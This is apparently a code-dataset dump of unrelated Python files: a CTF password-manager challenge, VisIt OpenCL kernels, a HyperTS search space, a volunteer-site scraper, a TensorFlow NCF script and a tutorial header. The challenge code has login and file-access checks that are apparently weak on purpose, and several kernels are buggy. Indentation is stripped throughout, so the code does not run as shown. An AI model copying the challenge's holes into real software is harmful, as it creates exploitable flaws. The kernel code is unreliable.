if c > 0x7e or c < 0x20:
print("printable chars only!!")
flag = False
break
if flag:
break
try:
with open(pin, "w") as f:
f.write(username + "\n" + password)
print("saved!!")
except OSError:
print("pin is invalid!!")
def safety_guard():
print("safety guard activated. will delete all unsafe credentials hahaha...")
delete_file = []
for pin in os.listdir("."):
safe = True
with open(pin, "r") as f:
data = f.read().split("\n")
if len(data) != 2:
safe = False
elif len(data[0]) == 0 or len(data[1]) == 0:
safe = False
elif data[0].isalnum() == False or data[1].isalnum() == False:
safe = False
elif data[0] == "admin":
safe = False
if safe == False:
os.remove(pin)
delete_file.append(pin)
print(f"finished. delete {len(delete_file)} unsafe credentials: {delete_file}")
def fast_login():
while True:
pin = input("enter a pin code > ")
if len(pin) > 100:
print("too long...")
continue
if "\\" in pin or "/" in pin or ".." in pin:
print("what do you want to do?(¬_¬)")
continue
flag = True
for c in pin.encode("utf8"):
if c > 0x7e or c < 0x20:
print("printable chars only!!")
flag = False
break
if flag:
break
try:
with open(pin, "r") as f:
data = f.read().split("\n")
if len(data) != 2:
print("unknown error happened??")
return None, None
return data[0], data[1]
except FileNotFoundError:
print("this pin code is not registered.")
return None, None
def normal_login():
while True:
username = input("enter username > ")
if len(username) > 100:
print("too long...")
elif username.isalnum() == False:
print("strange username, huh?")
elif username == "admin":
print("no you are definitely not (╬ Ò ‸ Ó)")
else:
break
while True:
password = input("enter password > ")
if len(password) > 100:
print("too long...")
continue
elif password.isalnum() == False:
print("strange password, huh?")
else:
break
return username, password
def login():
safety_guard()
while True:
print("1. fast login")
print("2. normal login")
print("3. exit")
x = input("enter login type > ")
if x == "1":
username, password = fast_login()
elif x == "2":
username, password = normal_login()
elif x == "3":
print("bye-bye~")
return
else:
print("invalid input.")
continue
if username != None and password != None:
print(f"hello, {username}.")
if username == "admin":
while True:
x = input("do you want the flag? (y/n): ")
if x == "n":
print("OK, bye~")
return
elif x == "y":
break
else:
print("invalid input.")
while True:
x = input("beg me: ")
if x == "plz":
print("ok, here is your flag: BALSN{flag is here ...}")
break
return
def main():
init()
try:
while True:
print("1. passord manager")
print("2. login")
print("3. exit")
x = input("what do you want to do? > ")
if x == "1":
password_manager()
elif x == "2":
login()
elif x == "3":
print("bye-bye~")
break
else:
print(f"invalid input: {x}")
except KeyboardInterrupt:
print("bye-bye~")
except:
print("unexpected error occured.")
os.chdir("../")
shutil.rmtree(base_dir)
if __name__ == "__main__":
main()
| 26.70852 | 85 | 0.442915 |
60c0cd827415a46d31c66b3462e5fe5c9ac90ec0
| 9,435 |
py
|
Python
|
src/visitpy/visit_flow/flow/src/filters/pyocl_kernels.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 226 |
2018-12-29T01:13:49.000Z
|
2022-03-30T19:16:31.000Z
|
src/visitpy/visit_flow/flow/src/filters/pyocl_kernels.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 5,100 |
2019-01-14T18:19:25.000Z
|
2022-03-31T23:08:36.000Z
|
src/visitpy/visit_flow/flow/src/filters/pyocl_kernels.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 84 |
2019-01-24T17:41:50.000Z
|
2022-03-10T10:01:46.000Z
|
# Copyright (c) Lawrence Livermore National Security, LLC and other VisIt
# Project developers. See the top-level LICENSE file for dates and other
# details. No copyright assignment is required to contribute to VisIt.
"""
file: pyocl_kernels.py
author: Cyrus Harrison <[email protected]>
created: 9/6/2012
description:
"""
# Guarded import of pyopencl
found_pyopencl = False
try:
import numpy as npy
import pyopencl as cl
found_pyopencl = True
except ImportError:
pass
Kernels = {
### add
"kadd" : {"name": "add",
"input_ports": ["in_a","in_b"],
"src":"""
float kadd(const float a,const float b)
{return a + b;}
"""},
### sub
"ksub" : {"name": "sub",
"input_ports": ["in_a","in_b"],
"src":"""
float ksub(const float a,const float b)
{return a - b;}
"""},
### mult
"kmult": {"name": "mult",
"input_ports": ["in_a","in_b"],
"src":"""
float kmult(const float a,const float b)
{return a * b;}
"""},
### div
"kdiv": {"name": "div",
"input_ports": ["in_a","in_b"],
"src":"""
float kdiv(const float a,const float b)
{return a / b;}
"""},
### mod
"kmod": {"name": "mod",
"input_ports": ["in_a","in_b"],
"src":"""
float kmod(const float a, const float b)
{return a % b;}
"""},
### cos
"kcos" : {"name": "cos",
"input_ports": ["in"],
"src":"""
float kcos(const float a)
{return cos(a);}
"""},
### sin
"ksin": {"name": "sin",
"input_ports": ["in"],
"src":"""
float ksin(const float a)
{return sin(a);}
"""},
### sin
"ktan": {"name": "tan",
"input_ports": ["in"],
"src": """
float ktan(const float a)
{return tan(a);}
"""},
### ciel
"kciel": {"name": "ciel",
"input_ports": ["in"],
"src": """
float kceil(const float a)
{return ceil(a);}
"""},
### floor
"kfloor": {"name": "floor",
"input_ports": ["in"],
"src":"""
float kfloor(const float a)
{return floor(a);}
"""},
### abs
"kabs": {"name": "abs",
"input_ports": ["in"],
"src":"""
float kabs(const float a)
{return abs(a);}
"""},
### log10
"klog10": {"name": "log10",
"input_ports": ["in"],
"src":"""
float klog10(const float a)
{return log10(a);}
"""},
### log
"klog": {"name": "log",
"input_ports": ["in"],
"src":"""
float klog10(const float a)
{return log10(a);}
"""},
### exp
"kexp": {"name": "exp",
"input_ports": ["in"],
"src":"""
float kexp(const float a)
{return exp(a);}
"""},
### pow
"kpow": {"name": "pow",
"input_ports": ["in"],
"src":"""
float kpow(const float a, const float b)
{return kpow(a, b);}
"""},
### id
"kid": {"name": "id",
"input_ports": ["in"],
"src":"""
float kid(const float a)
{return a;}
"""},
### square
"ksquare": {"name": "square",
"input_ports": ["in"],
"src": """
float ksquare(const float a)
{return a*a;}
"""},
### sqrt
"ksqrt": {"name": "sqrt",
"input_ports": ["in"],
"src":"""
float ksqrt(const float a)
{return sqrt(a);}
"""},
### curl3d
"curl3d": {"name": "sqrt",
"input_ports": ["dfx","dfy","dfx"],
"in_types": ["direct",
"direct",
"direct"],
"out_type": "float4",
"src":"""
float4 kcurl3d(__global const float *dfx,
__global const float *dfy,
__global const float *dfz
{
int gid = get_global_id(0);
float dfzdy = dfz[gid*3+1];
float dfydz = dfy[gid*3+2];
float dfxdz = dfx[gid*3+2];
float dfzdx = dfz[gid*3];
float dfydx = dfy[gid*3];
float dfxdy = dfx[gid*3+1];
float4 res;
res.x = dfzdy - dfydz;
res.y = dfxdz - dfzdx;
res.z = dfydx - dfxdy;
}
"""},
### grad3d
"kgrad3d": {"name": "grad3d",
"input_ports": ["in","dims","x","y","z"],
"in_types": ["direct",
"direct",
"direct",
"direct",
"direct"],
"out_type": "float4",
"src":"""
float4 kgrad3d(__global const float *v,
__global const int *d,
__global const float *x,
__global const float *y,
__global const float *z)
{
int gid = get_global_id(0);
int di = d[0]-1;
int dj = d[1]-1;
int dk = d[2]-1;
int zi = gid % di;
int zj = (gid / di) % dj;
int zk = (gid / di) / dj;
// for rectilinear, we only need 2 points to get dx,dy,dz
int pi0 = zi + zj*(di+1) + zk*(di+1)*(dj+1);
int pi1 = zi + 1 + (zj+1)*(di+1) + (zk+1)*(di+1)*(dj+1);
float vv = v[gid];
float4 p_0 = (float4)(x[pi0],y[pi0],z[pi0],1.0);
float4 p_1 = (float4)(x[pi1],y[pi1],z[pi1],1.0);
float4 dg = p_1 - p_0;
// value
float4 f_0 = (float4)(vv,vv,vv,1.0);
float4 f_1 = (float4)(vv,vv,vv,1.0);
// i bounds
if(zi > 0)
{
f_0.x = v[gid-1];
}
if(zi < (di-1))
{
f_1.x = v[gid+1];
}
// j bounds
if(zj > 0)
{
f_0.y = v[gid-di];
}
if(zj < (dj-1))
{
f_1.y = v[gid+di];
}
// k bounds
if(zk > 0)
{
f_0.z = v[gid-(di*dj)];
}
if(zk < (dk-1))
{
f_1.z = v[gid+(di*dj)];
}
float4 df = (f_1 - f_0) / dg;
// central diff if we aren't on the edges
if( (zi != 0) && (zi != (di-1)))
{
df.x *= .5;
}
// central diff if we aren't on the edges
if( (zj != 0) && (zj != (dj-1)))
{
df.y *= .5;
}
// central diff if we aren't on the edges
if( (zk != 0) && (zk != (dk-1)))
{
df.z *= .5;
}
//return (float4)(1.0,2.0,3.0,0.0);
return df;
}
"""}
}
# fill in set defaults
for k,v in list(Kernels.items()):
if "out_type" not in v:
v["out_type"] = "float"
if "in_types" not in v:
v["in_types"] = [ "fetch" for ipt in v["input_ports"]]
def create_stub(filter,inputs):
# gen stub glue & execute
ident = " "
args_ident = " "
res = filter.kernel_source
res += "\n%s__kernel void kmain(" % ident
ninputs = len(inputs)
for idx in range(ninputs):
if isinstance(inputs[idx],float):
itype = "float"
elif inputs[idx].dtype == npy.int32:
itype = "int "
else:
itype = "float"
iname = "in_%04d" % idx
res += "__global const %s *%s,\n%s " % (itype,iname,args_ident)
res += "__global float *out)\n"
res += "%s{\n" % ident
res += "%s int gid = get_global_id(0);\n" % ident
call_names = []
for idx in range(ninputs):
iname = "in_%04d" % idx
if filter.in_types[idx] == "fetch":
if isinstance(inputs[idx],float):
itype = "float"
elif inputs[idx].dtype == npy.int32:
itype = "int "
else:
itype = "float"
cname = "%s_fetch" % iname
res += "%s %s %s = %s[gid];\n" % (ident,itype,cname,iname)
else:
cname = iname
call_names.append(cname)
call = "k%s(" % filter.filter_type
for cn in call_names:
call += "%s," % cn
call = call[:-1] + ")"
out_dim = None
if filter.out_type == "float":
res += "%s out[gid] = %s;\n" % (ident,call)
elif filter.out_type == "float4":
res += "%s float4 res = %s;\n" % (ident,call)
res += "%s out[gid*3] = res.x;\n" % (ident)
res += "%s out[gid*3+1] = res.y;\n" % (ident)
res += "%s out[gid*3+2] = res.z;\n" % (ident)
out_dim = 3
res += "%s}\n" % ident
return res, out_dim
| 28.248503 | 73 | 0.388977 |
8801d2b5ef8db337473836b1a6fae64413b8f56f
| 11,347 |
py
|
Python
|
hyperts/macro_search_space.py
|
zhangxjohn/HyperTS
|
c43c8d820d26dd362510997c1c294341279ce1e1
|
[
"Apache-2.0"
] | null | null | null |
hyperts/macro_search_space.py
|
zhangxjohn/HyperTS
|
c43c8d820d26dd362510997c1c294341279ce1e1
|
[
"Apache-2.0"
] | null | null | null |
hyperts/macro_search_space.py
|
zhangxjohn/HyperTS
|
c43c8d820d26dd362510997c1c294341279ce1e1
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
"""
"""
import numpy as np
from hyperts.macro_estimators import ProphetForecastEstimator, \
VARForecastEstimator, TSFClassificationEstimator
from hyperts.transformers import TimeSeriesHyperTransformer
from hyperts.utils import consts
from hypernets.tabular import column_selector as tcs
from hypernets.core.ops import HyperInput, ModuleChoice, Optional
from hypernets.core.search_space import HyperSpace, Choice
from hypernets.pipeline.transformers import SimpleImputer, StandardScaler, \
MinMaxScaler, MaxAbsScaler, SafeOrdinalEncoder, AsTypeTransformer
from hypernets.pipeline.base import Pipeline, DataFrameMapper
from hypernets.utils import logging, get_params
logger = logging.get_logger(__name__)
##################################### Define Data Proprecessing Pipeline #####################################
class WithinColumnSelector:
def __init__(self, selector, selected_cols):
self.selector = selector
self.selected_cols = selected_cols
def __call__(self, df):
intersection = set(df.columns.tolist()).intersection(self.selected_cols)
if len(intersection) > 0:
selected_df = df[intersection]
return self.selector(selected_df)
else:
return []
def categorical_transform_pipeline(covariables=None, impute_strategy=None, seq_no=0):
if impute_strategy is None:
impute_strategy = Choice(['constant', 'most_frequent'])
elif isinstance(impute_strategy, list):
impute_strategy = Choice(impute_strategy)
steps = [
AsTypeTransformer(dtype='str', name=f'categorical_as_object_{seq_no}'),
SimpleImputer(missing_values=np.nan,
strategy=impute_strategy,
name=f'categorical_imputer_{seq_no}'),
SafeOrdinalEncoder(name=f'categorical_label_encoder_{seq_no}',
dtype='int32')
]
if covariables is not None:
cs = WithinColumnSelector(tcs.column_object_category_bool, covariables)
else:
cs = tcs.column_object_category_bool
pipeline = Pipeline(steps, columns=cs,
name=f'categorical_covariable_transform_pipeline_{seq_no}')
return pipeline
def numeric_transform_pipeline(covariables=None, impute_strategy=None, seq_no=0):
if impute_strategy is None:
impute_strategy = Choice(['mean', 'median', 'constant', 'most_frequent'])
elif isinstance(impute_strategy, list):
impute_strategy = Choice(impute_strategy)
imputer = SimpleImputer(missing_values=np.nan,
strategy=impute_strategy,
name=f'numeric_imputer_{seq_no}',
force_output_as_float=True)
scaler_options = ModuleChoice(
[
StandardScaler(name=f'numeric_standard_scaler_{seq_no}'),
MinMaxScaler(name=f'numeric_minmax_scaler_{seq_no}'),
MaxAbsScaler(name=f'numeric_maxabs_scaler_{seq_no}')
], name=f'numeric_or_scaler_{seq_no}'
)
scaler_optional = Optional(scaler_options, keep_link=True, name=f'numeric_scaler_optional_{seq_no}')
if covariables == None:
cs = WithinColumnSelector(tcs.column_number_exclude_timedelta, covariables)
else:
cs = tcs.column_number_exclude_timedelta
pipeline = Pipeline([imputer, scaler_optional], columns=cs,
name=f'numeric_covariate_transform_pipeline_{seq_no}')
return pipeline
##################################### Define Base Search Space Generator #####################################
class _HyperEstimatorCreator:
def __init__(self, cls, init_kwargs, fit_kwargs):
super(_HyperEstimatorCreator, self).__init__()
self.estimator_cls = cls
self.estimator_fit_kwargs = fit_kwargs if fit_kwargs is not None else {}
self.estimator_init_kwargs = init_kwargs if init_kwargs is not None else {}
def __call__(self, *args, **kwargs):
return self.estimator_cls(self.estimator_fit_kwargs, **self.estimator_init_kwargs)
class BaseSearchSpaceGenerator:
def __init__(self, **kwargs) -> None:
super().__init__()
self.options = kwargs
@property
def estimators(self):
raise NotImplementedError
def create_preprocessor(self, hyper_input, options):
dataframe_mapper_default = options.pop('dataframe_mapper_default', False)
covariables = options.pop('covariables', None)
timestamp = options.pop('timestamp', None)
pipelines = []
if covariables is not None:
# category
pipelines.append(categorical_transform_pipeline(covariables=covariables)(hyper_input))
# numeric
pipelines.append(numeric_transform_pipeline(covariables=covariables)(hyper_input))
# timestamp
if timestamp is not None:
pipelines.append(Pipeline([TimeSeriesHyperTransformer()],
columns=[timestamp],
name=f'timestamp_transform_pipeline_0')(hyper_input))
preprocessor = DataFrameMapper(default=dataframe_mapper_default, input_df=True, df_out=True,
df_out_dtype_transforms=[(tcs.column_object, 'int')])(pipelines)
return preprocessor
def create_estimators(self, hyper_input, options):
assert len(self.estimators.keys()) > 0
creators = [_HyperEstimatorCreator(pairs[0],
init_kwargs=self._merge_dict(pairs[1],
options.pop(f'{k}_init_kwargs', None)),
fit_kwargs=self._merge_dict(pairs[2], options.pop(f'{k}_fit_kwargs', None)))
for k, pairs in self.estimators.items()]
unused = {}
for k, v in options.items():
used = False
for c in creators:
if k in c.estimator_init_kwargs.keys():
c.estimator_init_kwargs[k] = v
used = True
if k in c.estimator_fit_kwargs.keys():
used = True
if not used:
unused[k] = v
if len(unused) > 0:
for c in creators:
c.estimator_fit_kwargs.update(unused)
estimators = [c() for c in creators]
return ModuleChoice(estimators, name='estimator_options')(hyper_input)
def __call__(self, *args, **kwargs):
options = self._merge_dict(self.options, kwargs)
space = HyperSpace()
with space.as_default():
hyper_input = HyperInput(name='input1')
self.create_estimators(self.create_preprocessor(hyper_input, options), options)
space.set_inputs(hyper_input)
return space
def _merge_dict(self, *args):
d = {}
for a in args:
if isinstance(a, dict):
d.update(a)
return d
def __repr__(self):
params = get_params(self)
params.update(self.options)
repr_ = ', '.join(['%s=%r' % (k, v) for k, v in params.items()])
return f'{type(self).__name__}({repr_})'
##################################### Define Specific Search Space Generator #####################################
class StatsForecastSearchSpace(BaseSearchSpaceGenerator):
def __init__(self, task, timestamp=None,
enable_prophet=True,
enable_var=True,
**kwargs):
kwargs['timestamp'] = timestamp
print("Tip: If other parameters exist, set them directly. For example, covariables=['is_holiday'].")
super(StatsForecastSearchSpace, self).__init__(**kwargs)
self.task = task
self.timestamp = timestamp
self.enable_prophet = enable_prophet
self.enable_var = enable_var
@property
def default_prophet_init_kwargs(self):
return {
'n_changepoints': Choice([25, 35, 45]),
'interval_width': Choice([0.6, 0.7, 0.8]),
'seasonality_mode': Choice(['additive', 'multiplicative'])
}
@property
def default_prophet_fit_kwargs(self):
return {
'timestamp': self.timestamp
}
@property
def default_var_init_kwargs(self):
return {
'ic': Choice(['aic', 'fpe', 'hqic', 'bic']),
'trend': Choice(['c', 'ct', 'ctt', 'nc', 'n']),
'y_scale': Choice(['min_max', 'max_abs', 'identity']),
'y_log': Choice(['logx', 'none'])
}
@property
def default_var_fit_kwargs(self):
return {
'timestamp': self.timestamp
}
@property
def estimators(self):
univar_containers = {}
multivar_containers = {}
if self.enable_prophet:
univar_containers['prophet'] = (
ProphetForecastEstimator, self.default_prophet_init_kwargs, self.default_prophet_fit_kwargs)
if self.enable_var:
multivar_containers['var'] = (
VARForecastEstimator, self.default_var_init_kwargs, self.default_var_fit_kwargs)
if self.task == consts.TASK_UNIVARIABLE_FORECAST:
return univar_containers
elif self.task == consts.TASK_MULTIVARIABLE_FORECAST:
return multivar_containers
else:
raise ValueError(f'Incorrect task name, default {consts.TASK_UNIVARIABLE_FORECAST}'
f' or {consts.TASK_MULTIVARIABLE_FORECAST}.')
class StatsClassificationSearchSpace(BaseSearchSpaceGenerator):
def __init__(self, task, timestamp=None,
enable_tsf=True,
**kwargs):
if hasattr(kwargs, 'covariables'):
kwargs.pop('covariables', None)
print("Tip: If other parameters exist, set them directly. For example, n_estimators=200.")
super(StatsClassificationSearchSpace, self).__init__(**kwargs)
self.task = task
self.timestamp = timestamp
self.enable_tsf = enable_tsf
@property
def default_tsf_init_kwargs(self): # Time Series Forest
return {
'min_interval': Choice([1, 3, 5, 7]),
'n_estimators': Choice([50, 100, 200, 300]),
}
@property
def default_tsf_fit_kwargs(self):
return {
'timestamp': self.timestamp
}
@property
def estimators(self):
containers = {}
if self.enable_tsf:
containers['tsf'] = (TSFClassificationEstimator, self.default_tsf_init_kwargs, self.default_tsf_fit_kwargs)
return containers
stats_forecast_search_space = StatsForecastSearchSpace
stats_classification_search_space = StatsClassificationSearchSpace
stats_regression_search_space = None
dl_univariate_forecast_search_space = None
dl_multivariate_forecast_search_space = None
dl_univariate_classification_search_space = None
dl_multivariate_classification_search_space = None
if __name__ == '__main__':
from hypernets.searchers.random_searcher import RandomSearcher
sfss = stats_forecast_search_space(task='univariable-forecast', timestamp='ts', covariables=['id', 'cos'])
searcher = RandomSearcher(sfss, optimize_direction='min')
sample = searcher.sample()
print(sample)
| 36.252396 | 119 | 0.628448 |
98f3c32a23563392b8045420c233953252ae871a
| 4,516 |
py
|
Python
|
etl/data_extraction/scrapers/dksb_kinderschutzbund.py
|
Betadinho/einander-helfen
|
272f11397d80ab5267f39a7b36734495f1c00b0c
|
[
"MIT"
] | 7 |
2020-04-23T20:16:11.000Z
|
2022-01-04T14:57:16.000Z
|
etl/data_extraction/scrapers/dksb_kinderschutzbund.py
|
Betadinho/einander-helfen
|
272f11397d80ab5267f39a7b36734495f1c00b0c
|
[
"MIT"
] | 361 |
2020-04-23T17:20:14.000Z
|
2022-03-02T11:29:45.000Z
|
etl/data_extraction/scrapers/dksb_kinderschutzbund.py
|
Betadinho/einander-helfen
|
272f11397d80ab5267f39a7b36734495f1c00b0c
|
[
"MIT"
] | 1 |
2021-11-29T06:02:52.000Z
|
2021-11-29T06:02:52.000Z
|
import re
from data_extraction.scraper import Scraper
class DKSBScraper(Scraper):
"""Scrapes the website dksb.de."""
base_url = 'https://www.dksb.de'
debug = True
def parse(self, response, url):
"""Handles the soupified response of a detail page in the predefined way and returns it"""
self.logger.debug('parse()')
content = response.find('div', {'class': 'remodal-content'})
title_h2 = content.find('h2', {'class': 'subHeadline'})
title = 'Deutscher Kinderschutzbund ' + title_h2.text
next_elem = title_h2.next_sibling
loc = []
zipcode = None
contact = ''
is_loc_part = True
while next_elem is not None:
if is_loc_part and re.match(r'<b>', str(next_elem)):
is_loc_part = False
if is_loc_part and not re.match(r'<.*?>', str(next_elem)):
elem = str(next_elem).strip()
if len(elem) > 0:
loc.append(elem)
if re.match(r'\d{5} ', elem):
zipcode = elem.split(' ')[0]
if not is_loc_part:
contact += str(next_elem)
next_elem = next_elem.next_sibling
parsed_object = {
'title': title,
'categories': ['Kinder', 'Jugend'],
'location': ', '.join(loc),
'task': """Der Deutsche Kinderschutzbund (DKSB) bietet Ihnen in seinen Orts- und Landesverbänden eine Vielzahl von Möglichkeiten, sich freiwillig zu engagieren.<br>
Wenn Ihre Stärken in der Arbeit mit Kindern oder Familien liegen, können Sie z.B. in der Hausaufgabenhilfe oder in Hilfsangeboten für Familien mitarbeiten. Möchten Sie sich in der Büroorganisation oder im Finanzbereich engagieren, sind Sie in der Vorstandsarbeit herzlich willkommen. Auch bei der fachpolitischen Lobbyarbeit für Kinder und Familien ist Ihr Engagement wichtig. Setzen Sie sich in Ihrer Gemeinde für den Kinderschutz ein.<br>
Wenn Sie ehrenamtlich beim DKSB mitarbeiten, lernen Sie gleichgesinnte Menschen kennen und können sich in der Arbeit mit Kindern und Familien weiterqualifizieren. Zudem bestimmen Sie die Verbandsarbeit aktiv mit.""",
'target_group': None,
'prerequisites': None,
'language_skills': None,
'timing': None,
'effort': None,
'opportunities': None,
'organization': None,
'contact': contact,
'link': url or None,
'source': 'www.dksb.de',
'geo_location': None,
}
parsed_object['post_struct'] = {
'title': parsed_object['title'],
'categories': parsed_object['categories'],
'location': {
'country': 'Deutschland',
'zipcode': zipcode,
'city': None,
'street': None,
},
'task': None,
'target_group': None,
'prerequisites': None,
'language_skills': None,
'timing': None,
'effort': None,
'opportunities': None,
'organization': None,
'contact': None,
'link': parsed_object['link'],
'source': parsed_object['source'],
'geo_location': parsed_object['geo_location'],
}
return parsed_object
def add_urls(self):
"""Adds all URLs of detail pages, found on the search pages, for the crawl function to scrape"""
self.logger.debug('add_urls()')
search_page_url = f'{self.base_url}/de/dksb-vor-ort/'
response = self.soupify(search_page_url)
detail_list_entries = response.find_all('div', {'class': 'list-dksbvorort-item'})
self.logger.debug(f'Fetched {len(detail_list_entries)} URLs from {search_page_url} [1/1]')
self.update_fetching_progress(1, 1)
# Iterate links and add, if not already found
for list_entry in detail_list_entries:
current_link = self.base_url + '/template/php/dksbvorort/details.php?key=' + list_entry['name']
if current_link in self.urls:
self.logger.debug(f'func: add_urls, page_index: 1,'
f' search_page: {search_page_url}, '
f'duplicate_index: {current_link}, '
f'duplicate_index: {self.urls.index(current_link)}')
else:
self.urls.append(current_link)
| 41.814815 | 440 | 0.580602 |
1be4de6cb8b2d5185f3dc017be273257ae0589df
| 6,858 |
py
|
Python
|
Liquid-job-NeuMF/official/recommendation/ncf_estimator_main.py
|
PasaLab/YAO
|
2e70203197cd79f9522d65731ee5dc0eb236b005
|
[
"Apache-2.0"
] | 2 |
2021-08-30T14:12:09.000Z
|
2022-01-20T02:14:22.000Z
|
Liquid-job-NeuMF/official/recommendation/ncf_estimator_main.py
|
PasaLab/YAO
|
2e70203197cd79f9522d65731ee5dc0eb236b005
|
[
"Apache-2.0"
] | null | null | null |
Liquid-job-NeuMF/official/recommendation/ncf_estimator_main.py
|
PasaLab/YAO
|
2e70203197cd79f9522d65731ee5dc0eb236b005
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""NCF framework to train and evaluate the NeuMF model.
The NeuMF model assembles both MF and MLP models under the NCF framework. Check
`neumf_model.py` for more details about the models.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import heapq
import json
import math
import multiprocessing
import os
import signal
import typing
# pylint: disable=g-bad-import-order
import numpy as np
from absl import app as absl_app
from absl import flags
from absl import logging
import tensorflow as tf
# pylint: enable=g-bad-import-order
from official.recommendation import constants as rconst
from official.recommendation import data_pipeline
from official.recommendation import data_preprocessing
from official.recommendation import movielens
from official.recommendation import ncf_common
from official.recommendation import neumf_model
from official.utils.flags import core as flags_core
from official.utils.logs import hooks_helper
from official.utils.logs import logger
from official.utils.logs import mlperf_helper
from official.utils.misc import distribution_utils
from official.utils.misc import model_helpers
FLAGS = flags.FLAGS
def construct_estimator(model_dir, params):
"""Construct either an Estimator for NCF.
Args:
model_dir: The model directory for the estimator
params: The params dict for the estimator
Returns:
An Estimator.
"""
distribution = ncf_common.get_v1_distribution_strategy(params)
run_config = tf.estimator.RunConfig(train_distribute=distribution,
eval_distribute=distribution)
model_fn = neumf_model.neumf_model_fn
estimator = tf.estimator.Estimator(model_fn=model_fn, model_dir=model_dir,
config=run_config, params=params)
return estimator
def log_and_get_hooks(eval_batch_size):
"""Convenience function for hook and logger creation."""
# Create hooks that log information about the training and metric values
train_hooks = hooks_helper.get_train_hooks(
FLAGS.hooks,
model_dir=FLAGS.model_dir,
batch_size=FLAGS.batch_size, # for ExamplesPerSecondHook
tensors_to_log={"cross_entropy": "cross_entropy"}
)
run_params = {
"batch_size": FLAGS.batch_size,
"eval_batch_size": eval_batch_size,
"number_factors": FLAGS.num_factors,
"hr_threshold": FLAGS.hr_threshold,
"train_epochs": FLAGS.train_epochs,
}
benchmark_logger = logger.get_benchmark_logger()
benchmark_logger.log_run_info(
model_name="recommendation",
dataset_name=FLAGS.dataset,
run_params=run_params,
test_id=FLAGS.benchmark_test_id)
return benchmark_logger, train_hooks
def main(_):
with logger.benchmark_context(FLAGS), \
mlperf_helper.LOGGER(FLAGS.output_ml_perf_compliance_logging):
mlperf_helper.set_ncf_root(os.path.split(os.path.abspath(__file__))[0])
run_ncf(FLAGS)
def run_ncf(_):
"""Run NCF training and eval loop."""
params = ncf_common.parse_flags(FLAGS)
num_users, num_items, num_train_steps, num_eval_steps, producer = (
ncf_common.get_inputs(params))
params["num_users"], params["num_items"] = num_users, num_items
producer.start()
model_helpers.apply_clean(flags.FLAGS)
estimator = construct_estimator(model_dir=FLAGS.model_dir, params=params)
benchmark_logger, train_hooks = log_and_get_hooks(params["eval_batch_size"])
total_training_cycle = FLAGS.train_epochs // FLAGS.epochs_between_evals
target_reached = False
mlperf_helper.ncf_print(key=mlperf_helper.TAGS.TRAIN_LOOP)
for cycle_index in range(total_training_cycle):
assert FLAGS.epochs_between_evals == 1 or not mlperf_helper.LOGGER.enabled
logging.info("Starting a training cycle: {}/{}".format(
cycle_index + 1, total_training_cycle))
mlperf_helper.ncf_print(key=mlperf_helper.TAGS.TRAIN_EPOCH,
value=cycle_index)
train_input_fn = producer.make_input_fn(is_training=True)
estimator.train(input_fn=train_input_fn, hooks=train_hooks,
steps=num_train_steps)
logging.info("Beginning evaluation.")
eval_input_fn = producer.make_input_fn(is_training=False)
mlperf_helper.ncf_print(key=mlperf_helper.TAGS.EVAL_START,
value=cycle_index)
eval_results = estimator.evaluate(eval_input_fn, steps=num_eval_steps)
logging.info("Evaluation complete.")
hr = float(eval_results[rconst.HR_KEY])
ndcg = float(eval_results[rconst.NDCG_KEY])
loss = float(eval_results["loss"])
mlperf_helper.ncf_print(
key=mlperf_helper.TAGS.EVAL_TARGET,
value={"epoch": cycle_index, "value": FLAGS.hr_threshold})
mlperf_helper.ncf_print(key=mlperf_helper.TAGS.EVAL_ACCURACY,
value={"epoch": cycle_index, "value": hr})
mlperf_helper.ncf_print(
key=mlperf_helper.TAGS.EVAL_HP_NUM_NEG,
value={"epoch": cycle_index, "value": rconst.NUM_EVAL_NEGATIVES})
mlperf_helper.ncf_print(key=mlperf_helper.TAGS.EVAL_STOP, value=cycle_index)
# Benchmark the evaluation results
benchmark_logger.log_evaluation_result(eval_results)
# Log the HR and NDCG results.
logging.info(
"Iteration {}: HR = {:.4f}, NDCG = {:.4f}, Loss = {:.4f}".format(
cycle_index + 1, hr, ndcg, loss))
# If some evaluation threshold is met
if model_helpers.past_stop_threshold(FLAGS.hr_threshold, hr):
target_reached = True
break
mlperf_helper.ncf_print(key=mlperf_helper.TAGS.RUN_STOP,
value={"success": target_reached})
producer.stop_loop()
producer.join()
# Clear the session explicitly to avoid session delete error
tf.keras.backend.clear_session()
mlperf_helper.ncf_print(key=mlperf_helper.TAGS.RUN_FINAL)
if __name__ == "__main__":
logging.set_verbosity(logging.INFO)
ncf_common.define_ncf_flags()
absl_app.run(main)
| 36.094737 | 81 | 0.715223 |
409ee4439c5e2beef5d84d0609d9d97498d8be26
| 3,831 |
py
|
Python
|
python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-numpy_array_indexing.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-numpy_array_indexing.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-numpy_array_indexing.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CS231n Convolutional Neural Networks for Visual Recognition
http://cs231n.github.io/
Python Numpy Tutorial
http://cs231n.github.io/python-numpy-tutorial/
Numpy Reference
https://docs.scipy.org/doc/numpy/reference/
 ̄
python_numpy_tutorial-numpy_array_indexing.py
2019-07-02 (Tue)
"""
